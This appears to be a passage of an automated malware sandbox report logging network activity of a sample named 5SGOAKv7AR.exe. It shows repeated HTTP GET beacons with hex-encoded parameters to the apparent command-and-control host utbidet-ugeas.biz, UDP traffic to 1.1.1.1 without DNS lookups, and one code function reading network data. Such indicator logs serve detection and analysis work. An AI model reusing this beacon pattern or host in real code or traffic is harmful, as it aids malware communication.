Source: global trafficHTTP traffic detected: GET /d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553F5DB HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5D HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5D HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?027A06F3CB7D06F3CB4806DBCB7A067D18EE3E5B917B0633637805C5E54828CAF94A36DDCB HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?027A06F3CB7D06F3CB4806DBCB7A067D18EE3E5B917B0633637805C5E54828CAF94A36DDCB HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7266 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7266 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0292F796E195F796E1A0F7BEE192F7183206CF3EBB93F7564990F4A0CFA0D9AFD3A2C7B8E1 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0292F796E195F796E1A0F7BEE192F7183206CF3EBB93F7564990F4A0CFA0D9AFD3A2C7B8E1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828A HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828A HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0228AD75372FAD75371AAD5D3728ADFBE4BC95DD6D29ADB59F2AAE43191A834C05189D5B37 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0228AD75372FAD75371AAD5D3728ADFBE4BC95DD6D29ADB59F2AAE43191A834C05189D5B37 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4DEC HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4DEC HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E61C9 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E61C9 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_0040263A InternetReadFile,select,recv,0_2_0040263A
Source: global trafficHTTP traffic detected: GET /d/N?025C90F0795C90F0796E90DC795C907EAAC8A858235D9030D15E93C6576EBEC94B6CA0DE79 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025C90F0795C90F0796E90DC795C907EAAC8A858235D9030D15E93C6576EBEC94B6CA0DE79 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0224E513A724E513A716E53FA724E59D74B0DDBBFD25E5D30F26E6258916CB2A9514D53DA7 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0224E513A724E513A716E53FA724E59D74B0DDBBFD25E5D30F26E6258916CB2A9514D53DA7 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?023421E6213421E6210621CA21342168F2A0194E7B352126893622D00F060FDF130411C821 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?023421E6213421E6210621CA21342168F2A0194E7B352126893622D00F060FDF130411C821 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0254F4433754F4433766F46F3754F4CDE4C0CCEB6D55F4839F56F7751966DA7A0564C46D37 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0254F4433754F4433766F46F3754F4CDE4C0CCEB6D55F4839F56F7751966DA7A0564C46D37 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02883DBC9B8F3DBC9BBA3D949B883D32481C0514C1893D7C338A3E8AB5BA1385A9B80D929B HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02883DBC9B8F3DBC9BBA3D949B883D32481C0514C1893D7C338A3E8AB5BA1385A9B80D929B HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02C3651025C4651025F1653825C3659EF6575DB87FC265D08DC166260BF14B2917F3553E25 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02C3651025C4651025F1653825C3659EF6575DB87FC265D08DC166260BF14B2917F3553E25 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02807A0D42877A0D42B27A2542807A83911442A518817ACDEA82793B6CB2543470B04A2342 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02807A0D42877A0D42B27A2542807A83911442A518817ACDEA82793B6CB2543470B04A2342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02607BE3D5677BE3D5527BCBD5607B6D06F4434B8F617B237D6278D5FB5255DAE7504BCDD5 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02607BE3D5677BE3D5527BCBD5607B6D06F4434B8F617B237D6278D5FB5255DAE7504BCDD5 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0279CB82A47ECB82A44BCBAAA479CB0C77EDF32AFE78CB420C7BC8B48A4BE5BB9649FBACA4 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0279CB82A47ECB82A44BCBAAA479CB0C77EDF32AFE78CB420C7BC8B48A4BE5BB9649FBACA4 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02E9217EECEE217EECDB2156ECE921F03F7D19D6B6E821BE44EB2248C2DB0F47DED91150EC HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02E9217EECEE217EECDB2156ECE921F03F7D19D6B6E821BE44EB2248C2DB0F47DED91150EC HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?028FF41BD188F41BD1BDF433D18FF495021BCCB38B8EF4DB798DF72DFFBDDA22E3BFC435D1 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?028FF41BD188F41BD1BDF433D18FF495021BCCB38B8EF4DB798DF72DFFBDDA22E3BFC435D1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0263D5344564D5344551D51C4563D5BA96F7ED9C1F62D5F4ED61D6026B51FB0D7753E51A45 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0263D5344564D5344551D51C4563D5BA96F7ED9C1F62D5F4ED61D6026B51FB0D7753E51A45 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0235A3ED6032A3ED6007A3C56035A363B3A19B453A34A32DC837A0DB4E078DD4520593C360 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0235A3ED6032A3ED6007A3C56035A363B3A19B453A34A32DC837A0DB4E078DD4520593C360 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0259AAD5925EAAD5926BAAFD9259AA5B41CD927DC858AA153A5BA9E3BC6B84ECA0699AFB92 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0259AAD5925EAAD5926BAAFD9259AA5B41CD927DC858AA153A5BA9E3BC6B84ECA0699AFB92 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?027E8E5D79798E5D794C8E75797E8ED3AAEAB6F5237F8E9DD17C8D6B574CA0644B4EBE7379 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?027E8E5D79798E5D794C8E75797E8ED3AAEAB6F5237F8E9DD17C8D6B574CA0644B4EBE7379 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02DEF47E9BD9F47E9BECF4569BDEF4F0484ACCD6C1DFF4BE33DCF748B5ECDA47A9EEC4509B HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02DEF47E9BD9F47E9BECF4569BDEF4F0484ACCD6C1DFF4BE33DCF748B5ECDA47A9EEC4509B HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025085CC3A5785CC3A6285E43A508542E9C4BD646051850C925286FA1462ABF50860B5E23A HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025085CC3A5785CC3A6285E43A508542E9C4BD646051850C925286FA1462ABF50860B5E23A HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02A8ABCE52AFABCE529AABE652A8AB40813C936608A9AB0EFAAAA8F87C9A85F760989BE052 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02A8ABCE52AFABCE529AABE652A8AB40813C936608A9AB0EFAAAA8F87C9A85F760989BE052 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02B2F2472FB5F2472F80F26F2FB2F2C9FC26CAEF75B3F28787B0F1710180DC7E1D82C2692F HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02B2F2472FB5F2472F80F26F2FB2F2C9FC26CAEF75B3F28787B0F1710180DC7E1D82C2692F HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02263F721B213F721B143F5A1B263FFCC8B207DA41273FB2B3243C443514114B29160F5C1B HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02263F721B213F721B143F5A1B263FFCC8B207DA41273FB2B3243C443514114B29160F5C1B HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0249C8E2654EC8E2657BC8CA6549C86CB6DDF04A3F48C822CD4BCBD44B7BE6DB5779F8CC65 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0249C8E2654EC8E2657BC8CA6549C86CB6DDF04A3F48C822CD4BCBD44B7BE6DB5779F8CC65 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02D0E53B31D7E53B31E2E51331D0E5B5E244DD936BD1E5FB99D2E60D1FE2CB0203E0D51531 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02D0E53B31D7E53B31E2E51331D0E5B5E244DD936BD1E5FB99D2E60D1FE2CB0203E0D51531 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02F373F88DF473F88DC173D08DF373765E674B50D7F2733825F170CEA3C15DC1BFC343D68D HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02F373F88DF473F88DC173D08DF373765E674B50D7F2733825F170CEA3C15DC1BFC343D68D HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?027026E9E57726E9E54226C1E570266736E41E41BF7126294D7225DFCB4208D0D74016C7E5 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?027026E9E57726E9E54226C1E570266736E41E41BF7126294D7225DFCB4208D0D74016C7E5 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0228CC01DC2FCC01DC1ACC29DC28CC8F0FBCF4A98629CCC1742ACF37F21AE238EE18FC2FDC HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0228CC01DC2FCC01DC1ACC29DC28CC8F0FBCF4A98629CCC1742ACF37F21AE238EE18FC2FDC HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?027812AD6B7F12AD6B4A12856B781223B8EC2A053179126DC37A119B454A3C94594822836B HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?027812AD6B7F12AD6B4A12856B781223B8EC2A053179126DC37A119B454A3C94594822836B HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?021685246B1185246B24850C6B1685AAB882BD8C311785E4C31486124524AB1D5926B50A6B HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?021685246B1185246B24850C6B1685AAB882BD8C311785E4C31486124524AB1D5926B50A6B HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0259BA88095EBA88096BBAA00959BA06DACD82205358BA48A15BB9BE276B94B13B698AA609 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0259BA88095EBA88096BBAA00959BA06DACD82205358BA48A15BB9BE276B94B13B698AA609 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02A8EA4905AFEA49059AEA6105A8EAC7D63CD2E15FA9EA89ADAAE97F2B9AC4703798DA6705 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02A8EA4905AFEA49059AEA6105A8EAC7D63CD2E15FA9EA89ADAAE97F2B9AC4703798DA6705 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0214874BFE13874BFE268763FE1487C52D80BFE3A415878B5616847DD026A972CC24B765FE HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0214874BFE13874BFE268763FE1487C52D80BFE3A415878B5616847DD026A972CC24B765FE HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02EB193971EC193971D9191171EB19B7A27F21912BEA19F9D9E91A0F5FD9370043DB291771 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02EB193971EC193971D9191171EB19B7A27F21912BEA19F9D9E91A0F5FD9370043DB291771 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025D7412245A7412246F743A245D749CF7C94CBA7E5C74D28C5F77240A6F5A2B166D443C24 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025D7412245A7412246F743A245D749CF7C94CBA7E5C74D28C5F77240A6F5A2B166D443C24 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
